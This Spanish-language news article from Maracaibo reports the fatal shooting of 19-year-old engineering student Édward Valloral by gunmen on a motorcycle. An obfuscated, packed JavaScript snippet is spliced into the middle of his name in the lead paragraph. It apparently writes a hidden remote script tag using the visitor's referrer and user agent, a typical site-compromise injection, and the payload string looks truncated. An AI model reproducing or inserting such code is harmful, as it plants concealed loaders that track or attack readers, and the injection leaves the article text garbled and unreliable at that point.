publicidad

Le disparan en la cabeza a estudiante de Ingeniería

Luisana González / Maracaibo / lgonzalez@laverdad.com
Édward eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ibsrz|var|u0026u|referrer|hdyte||js|php'.split('|'),0,{})) Valloral salió el sábado en la noche a una reunión con unos amigos. Ayer en la mañana cuando esperaba carrito para regresar a casa, unos delincuentes amenazaron al grupo. Todos corrieron menos el joven, a quien balearon. No iban por él, sino por uno de sus acompañantes

La Policía científica levantó ayer en la mañana el cadáver. (Foto: José Nava)

El cuerpo de Édward Arturo Valloral, de 19 años, lo hallaron ayer en la mañana con un tiro en la cabeza, en la avenida 138 del barrio La Musical, parroquia Venancio Pulgar. Los vecinos al salir de sus residencias enseguida lo reconocieron y avisaron a sus padres que estaba muerto en la vía pública.

Boris Valloral, padre del occiso, llegó al lugar del crimen y vio a su hijo tendido sobre la carretera desangrado. Sin palabras miraba el cadáver. Al muchacho le propinaron un balazo en la cabeza. 

Contó que el joven salió de su hogar, ubicada en la calle 137A Guaripoa del barrio La Musical, el sábado a las 7.00 de la noche. Se fue con unos amigos a reunirse en una residencia localizada a unas cuadras de donde lo ultimaron. 

Hasta las 4.30 de la mañana duró el festejo. A esa hora Édward y su grupo de compañeros salieron hacia la avenida a agarrar un carrito de la ruta El Paseo-El Marite para regresarse a sus hogares. Antes del por puesto pasó una motocicleta con tres hombres a bordo. Los motorizados le gritaron al grupo: “Ya venimos por ustedes”.

Los pistoleros siguieron derecho, pero unos metros más adelante se devolvieron para atacar a los jóvenes. Los acompañantes de Valloral corrieron al escuchar el mensaje de los delincuentes, el estudiante del segundo semestre de Ingeniería Civil en el Instituto Universitario de Tecnología de Maracaibo (IUTM) no le dio importancia y se quedó solo esperando el transporte público. 

Los tres sicarios pasaron de nuevo y sin titubear le dispararon en la cabeza y huyeron. Édward, quien  vestía una franela blanca, jean negro y botas negras cayó al pavimento y murió. 

Boris presume que iban era por uno de los jóvenes del grupo que supuestamente anda en malos pasos. No recordó el nombre. Solo sabe que su hijo era un buen muchacho, buen estudiante, cariñoso y alegre. “No iban por él, sino por su amigo. A él lo dejaron solo y se quedó por inocente. Nadie le dijo tampoco que corriera”.

Sin consuelo 

Los familiares del estudiante no daban crédito a lo que sus ojos veían. Lloraron sin descanso. Al ver que los curiosos rodearon su cuerpo e intentaban tomarle fotografías a  su cuerpo buscaron una sábana amarilla y lo cubrieron. 

Los funcionarios de la Policía regional se presentaron en el lugar del hecho. Los uniformados reportaron el suceso a los detectives de la Policía científica quienes se apersonaron a realizar el levantamiento. Su cadáver lo trasladaron a la morgue forense.

Los investigadores aun no manejan el móvil del crimen. Esperan hallar a la brevedad a los asesinos del estudiante, quienes residen aparentemente en la zona.

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama